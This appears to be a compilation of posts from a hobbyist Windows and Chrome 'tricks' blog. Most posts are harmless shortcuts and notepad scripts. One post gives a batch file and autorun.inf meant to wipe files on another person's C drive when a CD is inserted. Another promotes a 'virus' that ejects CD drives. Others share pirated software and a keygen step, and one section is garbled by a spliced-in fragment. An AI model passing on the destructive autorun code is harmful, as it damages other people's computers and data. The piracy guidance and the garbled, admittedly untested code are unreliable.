FIVE GOOGLE CHROME TRICKS THAT WILL EASE UP YOUR SURFING EXPERIENCE [TRICK]

Now, when we talk about the internet, the first thing that comes to mind is Google Chrome. If not, you need to get your brain checked. Talking of chrome, what do you like about it? The simplicity? The UI? The speed?

Well, here is what I like about it (you will like it too) --

1. Your Omnibox is a calculator - 

First of all, for those who do not know what the Omnibox is, it's the area where you type the URL of a website. Second of all, I know you do not know what I'm talking about. So look below - 

Pretty cool, eh? You can use it whenever you need to do a quick calculation. I'll leave the use to you. Just make sure you use the proper signs.

2. Your Omnibox is a unit converter - 

Another interesting feature of the omnibox is that it can convert units. For example, you do not know how much kilograms are 20 lbs. Just type in the omnibox - "20 lbs =" without the quotes. Here is what happens - 

P.S - Make sure you put an = sign after the unit you want to convert.

3. Reopen accidentally closed tabs - 

Do I need to explain? We have all had that dumb frustrating moment when we accidentally closed an important tab. Now there are two ways to reopen it. The first is to go to your history and find it there. But that is such a long process.

To reopen the recently closed tab, press ctrl+shift+t. Close this blog and then try it now.

4. Close all tabs with a single click (you will get them back) - 

Picture this - you are browsing facebook and your dad comes in. Now when he sees what you are doing, he will want to find out more. And then there is pain and trouble. The most basic way to avoid this is to close the tab. But if you do that, you will lose the progress on whatever you were doing on facebook. Any unsaved changes will be lost. Moreover, what if you had opened more undesirable websites? You cannot close them all at once. You may even want to open the tabs again. Here is the solution - 

Go HERE and download this chrome extension. It is called the panic button. It appears beside your omnibox. When you click on it, all open tabs will be closed. When you click on it again, they will reopen.

5. Switch between tabs with keyboard shortcuts - 

When we are doing some work which only involves the keyboard, like writing a blogger post or posting a status or something, reaching out for the mouse to switch tabs seems to be a pain. 

What you have to do is to hold ctrl and press between numbers 1 to 9 (not from the num pad). For example, if you want to open the 5th tab from the left, press ctrl+5. If you want to open the 2nd tab from the left, press ctrl+2 and so on.

3 WINDOWS 8/8.1 TIPS THAT YOU MUST KNOW ABOUT

So here we are with a Windows post (Am I obsessed?). This time, I am gonna tell you some awesome tweaks that you should know about to have a better windows experience. Let's BEGIN -

First of all, if you do not have windows 8.1, download it from here. It's awesome (that does not mean that these tricks don't work in windows 8)

1. Slide in To Shutdown. (May not be available in windows 8)

You'll get a better idea of what I am talking about after looking at the image below (not clicked by me) - 

Why go to options and then power and then shutdown when you can simply do it from the run command (in a very cool way) ?

What you need to do is this - Go to C://Windows/System32  and find the file named "SlideToShutDown". Try clicking on the file (your pc will not shut down). You'll understand what we are talking about here. Now either make a run command of the file or just make it's shortcut or pin it to the taskbar or whatever you want. To know how to make a run command, Go Here.

2. Open any file pinned to the taskbar without even touching the mouse.

Very easy trick. I won't explain much. What you need to do to achieve this trick is to simply count the position from the left (if taskbar is at bottom of screen) or from the top if the taskbar is at the side of the screen. Then press the windows key + the position of your file (the number pressed should be from the upper part of the keyboard and not from the numpad. For eg, in my pc, if I have to open windows explorer, I will have to press Windows+1 (because it is the 1st file from the left). Get the method?

3. Take Screenshots easily with a shortcut.

Not much to explain. Just press Windows+Print Screen button to take a screenshot of your pc. The screenshot will be saved in the "Screenshots" folder in your pictures library.

Well, my reader, you know how we pirates do things. After windows 8.1, microsoft directly jumped to 10. They simply skipped the digit 9. But that is not what is important. No matter what windows is released, all we need is that our pc looks like it and have the major features of the software. Idiots download the technical preview of windows 10, bigger idiots (MR. Jaiman) download it from torrent and think that it is full. However, Smart people go to Dusht Software and download the transformation pack and a few software. Boy, YOU'RE SMART. Enough talking, let's come to business. I am gonna provide some of the most major features of windows 10 so that you can "use windows 10" without installing it. I'll explain.

FEATURE 1 - WINDOWED METRO UI APPS.

You will get what I am talking about after looking at this screenshot - 

It is supported by a software named MetroMix. It is paid, which is why I have provided a mediafire download link in the bottom of this post. MetroMix allows you to run apps like marketplace and mail in windowed form. Something that is only possible in windows 10.

FEATURE 2 - MULTIPLE DESKTOPS

Windows 10 provides multiple desktops which you know nothing about. Don't worry, I will tell you about it. Your desktop is very crowded with different windows. You have to open another window but there is not space. The only way is........ no, there is no way. Situation sounds familiar? Windows 10 to the rescue! When your desktop is crowded, just switch to another desktop without deleting your previous one. It is like using another monitor but virtually. 4. Now click on the register tab and register with your username. Use the key generated for your username.

HOW TO MAKE YOUR OWN RUN COMMAND [TRICK] - Ease Your Life!!

Hi guys! This trick will ease your windows experience. This is for guys like me who are too lazy to open a folder and then open the thing that we want to. What we are dealing with here is the awesome run feature of windows. For those who do not know how to open it, it's simple . You just have to press Windows + R. The command will pop up.

So lets get down to the steps. Read on below -

STEPS - 

1) Whatever thing you are making a command for, make it's shortcut. We will make a shortcut of my      movies folder in this tutorial. (If you do not know how to make a shortcut, search the internet)

2) Now copy the shortcut and paste it in your windows root drive that is C://Windows. (The                    "windows" folder in local disc c)

3) Now open run command and type whatever the name of your shortcut was.

4) Glory! It will open up.


EXAMPLE - 

I created a shortcut of my movies folder, named it "movies" and pasted it in the root drive. It opened up.

CREATE INVISIBLE FOLDER [TRICK]

This is an amazing trick which you can hide your gaming or otherwise content from anyone. Even you will not be able to open the folder if you forget where you placed it. I will give screenshots below. But first  I will  tell you how to do it.

STEPS - 

1. Make a new folder (if you do not know how to do that, you do not deserve to visit this blog).

2. Now rename it. This is the main part. You have to rename it by holding the ALT key and then press the
    numbers 0,1,6,0 from the numpad (right side of keyboard) in order.

3. Now release ALT key and press ENTER. You will see that the folder you created has no name-

4. Now right click on the folder, select properties-

5. Click on the customise tab - 

6. Click on change icon - 

7. Now select the icon as shown below. Do not select any other icon. It looks like the place is empty, but it is actually a totally transparent icon. Do not miss it if you want to do this trick successfully.

Now place the folder you made invisible somewhere where nobody notices

MAKE WINDOWS COLLAPSE WHEN YOU LOG IN!!!!!!!!!! ( THE KEYBOARD NINJA TRICK) *[HACKING]*

Have you seen some movies in which someone crashes a computer just with a few keystrokes? Well, you cannot be a professional hacker without training and experience, but you can surely perform this feat any time you want to and impress your friends.

NOTE: One thing I want to make clear is that I am not sure if it will work in versions other than windows 7, but like I always say- since it is a small five-minute trick, it's worth a shot!

STEPS: 

1)  First, specify what kind of keyboard you have (usb or the normal type I do not know about) by        either looking at your CPU cabinet and judging, or by right clicking on my computer, clicking on      manage, then clicking on "device manager and seeing (there are other ways too, search for            them on the net)

2) Open run command (hold start and press "R") and type regedit in it.

3) On the left panel, you will see a general list. Depending on your keyboard type, browse to the folowing -

    USB keyboard - 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kbdhid\parameters


    Other keyboard - 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\i8042prt\Parameters


You might get something like this or maybe very different. But remember the path.

4)  Now right click and create a new DWORD KEY named CrashOnCtrlScroll and give it a value of one -

5) Its done!! Now the next time the computer is booting, you can trigger something like this screen by holding Ctrl key and pressing  Scroll lock twice.

NOTE: I was helped by vk. Remember rot to mess up with other registry values. One small mistake and you go boom. You might have seen the blue screen above many times and have thought that it will damage the pc, but it is actually a feature of windows to perform a crash dump.

Hello guys this trick is a short one and I will not be talking much. I am giving you the steps -

1. Create a new notepad document and open it.

2. Type the following code in it -

     Dim msg, sapi
 msg=InputBox(“Enter your text for conversion–www.dushthacking.blogspot.com”,”The DUSHT Text-To-Audio Converter”)
 Set sapi=CreateObject(“sapi.spvoice”)
 sapi.Speak msg

3. Save it with a ".vbs" extension( you know how to do that, right?)

4. Now open it and start converting text to audio.

NOTE : Please do not modify the code in any way. I recommend you to type the code( without modifying the code) instead of copying.

FORMAT SOMEONE'S LOCAL DISC C JUST BY INSERTING YOUR CD

Alright guys, in this trick, I will do the coding myself. So this might get wrong. But because it is a 1 minute trick, It's worth a shot. In this trick, I will show you how to format someones computer, just by putting in your CD. Now that sounds like hacking! But that's what we do.........
So let's get this straight, no more chit chat. Here are the steps -

1. Open your pen drive and create two notepad files.

2. In the first one, type the following code -
   @ECHO OFF DEL C:\ *.*|Y

3. Now save this file as dusht.bat. (select all files in the file type section).

4. Now open the other document and type in it the following code -

  [autorun]
Label="Dusht"
open="dusht.bat"

5. Now save it with a .inf extension. (select a"all files" in the file type option).

6. Now burn both files and put them into a CD.

I RECOMMEND YOU TO TYPE THESE CODES YOURSELF INSTEAD OF COPYING THEM.


NOTE: This trick will not work in a pen drive. Make sure you use a cd. And once done, do not put the cd back in your pc and do not run any of the two files. If you want to format another drive, or two drives, simply replace the letter after "DEL" with the other drive's letter.

HOW TO SET A BACKGROUND IMAGE IN PEN DRIVE [TRICK]

It is hard to make your friends believe that you are a tech expert. Here is a simple trick to do it.
As you read in the title, this trick is to set a background image of anything in your pendrive. May the image be of yours or of anything else, here is the trick -

1) Like everytime, you have to create a notepad document.

2) Now copy theimage you want as background to your pen drive. For ease, let's rename this image as "dusht.jpg".

3) Now open the notepad document and paste the following code there -

NOTE: you must save the file as desktop.ini

If the trick doesn't work, Try putting the image name in inverted commas.

The image name should include it's extension.

You can hide the image and the ini file for professional looking use.

HOW TO CHANGE PENDRIVE OR CD ICON [TRICK]

Are you bored with the regular box like icon of your pen drive? I have a solution. You can change it's icon using notepad. Here are some simple steps -

1) Open folder and layout options, choose view and unselect "hide extensions of known file type".

2) Now open your pen drive, and create a notepad document.

3) Type this in the document -

 [autorun]
 icon="[whatever the icon name is]"

4) Now save it as autorun.inf .

NOTE: Remember, the icon name should be the same as the name in the document.

You must save it with a ".inf extension. (select "all files".

Hide the icon and the autorun file for professional seeming use.

You can only use an icon (.ico) and not an image(.jpg, etc.)

MAKE A SMALL NON DAMAGING VIRUS WITH NOTEPAD [TRICK]

Hi guys, today I will tell you how to create a non damaging virus with notepad. It's damn simple. Just remember a few things-

1) Save the file with a ".vbs" extension.
2) Replaceall inverted commas with your own.

Oh yes, I forgot to tell, this virus will automatically eject all your cd drives. Even if you put them again. To stop this virus, simply go to processes in task manager and close the process of the file name.
